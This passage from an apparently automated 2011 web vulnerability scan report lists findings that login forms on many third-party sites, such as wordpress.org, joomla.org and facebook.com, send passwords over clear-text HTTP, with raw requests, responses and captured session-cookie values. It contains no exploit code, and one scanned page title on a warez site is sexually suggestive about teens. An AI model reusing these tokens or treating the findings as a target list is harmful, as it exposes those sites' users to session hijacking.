<form action="http://venedet.michnica.net/index.php/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.59. http://wordpress.org/extend/plugins/tweetmeme-follow-button/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme-follow-button/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field:

password

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 20241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>

       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.60. http://wordpress.org/extend/plugins/tweetmeme/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field:

password

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>

       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.61. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field:

password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:11:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>

       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.62. http://www.adside.com/adside/advertiser.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/advertiser.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.adside.com/adside/advertiser.html

The form contains the following password field:

password

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:23 GMT
ETag: W/"14556-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14556
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

6.63. http://www.adside.com/adside/publisher.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/publisher.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.adside.com/adside/publisher.html

The form contains the following password field:

password

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:22 GMT
ETag: W/"8990-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8990
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

6.64. http://www.americascupmedia.com/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.americascupmedia.com/index.php

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw <input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

6.65. http://www.barkerstores.com/soundings/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barkerstores.com
Path:	/soundings/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.barkerstores.com/soundings/Default.aspx

The form contains the following password field:

_ctl2:login:txtPassword

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<body>
       <form name="Form1" method="post" action="Default.aspx" id="Form1">
<input type="hidden" name="__EVENTTARGET" value="" />
...[SNIP]...
<BR>
                                       <input name="_ctl2:login:txtPassword" type="password" id="_ctl2_login_txtPassword" class="txBox" style="width:85px;" />
                                       </TD>
...[SNIP]...

6.66. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dynamicdrive.com/forums/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=381">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

6.67. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.eraser.ee
Path:	/uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.eraser.ee/uudised/joomla.html

The form contains the following password field:

passwd

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
<div class="main-login-form">
<form action="/uudised/joomla.html" method="post" name="login" id="form-login" >
<h4>
...[SNIP]...
<br />
<input name="passwd" id="mod_login_password" type="password" class="inputbox png" value="Parool" alt="Parool" onblur="if(this.value=='') this.value='Parool';" onfocus="if(this.value=='Parool') this.value='';" size="26" alt="password" />
</div>
...[SNIP]...

6.68. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

6.69. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

The form contains the following password field:

login_password

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
<div style="overflow: hidden; margin-bottom: 25px; padding-right: 15px;">
<form id="loginform" method="post" onsubmit="javascript:showBusyLayer()" action=''>

<input id="modlgn_username" type="text" name="login_name" class="inputbox" alt="username" size="18" onblur="if(this.value=='') this.value='username';" onfocus="if(this.value=='username')
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="login_password" class="inputbox" size="18" alt="password" onblur="if(this.value=='') this.value='password';" onfocus="if(this.value=='password') this.value='';" value="password" />

<div align="right">
...[SNIP]...

6.70. http://www.homes.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homes.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.homes.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:20 GMT
Set-Cookie: CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
Content-Length: 32451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Homes.com - Ho
...[SNIP]...
</div>
   <form method="post" onsubmit="return false;">
<fieldset id="myHomesLoginForm" class="popupForm">
...[SNIP]...
</label>
       <input class="text" type="password" name="password" id="password" size="46" maxlength="112" value="" />
   </div>
...[SNIP]...

6.71. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.id-joomla.com
Path:	/berita-joomla/648-joomla-16-telah-datang

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.id-joomla.com/component/comprofiler/login

The form contains the following password field:

passwd

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: 49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45105

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<div class="moduletable_inner"><form action="http://www.id-joomla.com/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.72. http://www.joomla.org/login.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.joomla.org
Path:	/login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.joomla.org/login.html

The form contains the following password field:

passwd

Request

GET /login.html HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
<input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
</p>
...[SNIP]...

6.73. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.joomla.org.tw
Path:	/news/joomla-official-news/163-joomla16-arrived

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.joomla.org.tw/component/comprofiler/login

The form contains the following password field:

passwd

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...
<div class="module"><form action="http://www.joomla.org.tw/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.74. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.joomlacommunity.eu/index.php

The form contains the following password field:

passwd

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
</h3>


<form action="http://www.joomlacommunity.eu/index.php" method="post" name="login" id="form-login" >
           <label for="modlgn_username">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
           <label for="modlgn_remember">
...[SNIP]...

6.75. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.joomlacorner.com/joomla-news/index.php

The form contains the following password field:

passwd

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<div class="ja-box-ct clearfix">
       <form action="index.php" method="post" name="form-login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

6.76. http://www.linkagogo.com/go/AddNoPopup previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.linkagogo.com/go/AddNoPopup

The form contains the following password field:

password

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<form name=urlEdit method="post" action="/go/AddNoPopup">
<input type="hidden" name="target" value="null">
...[SNIP]...
<td>
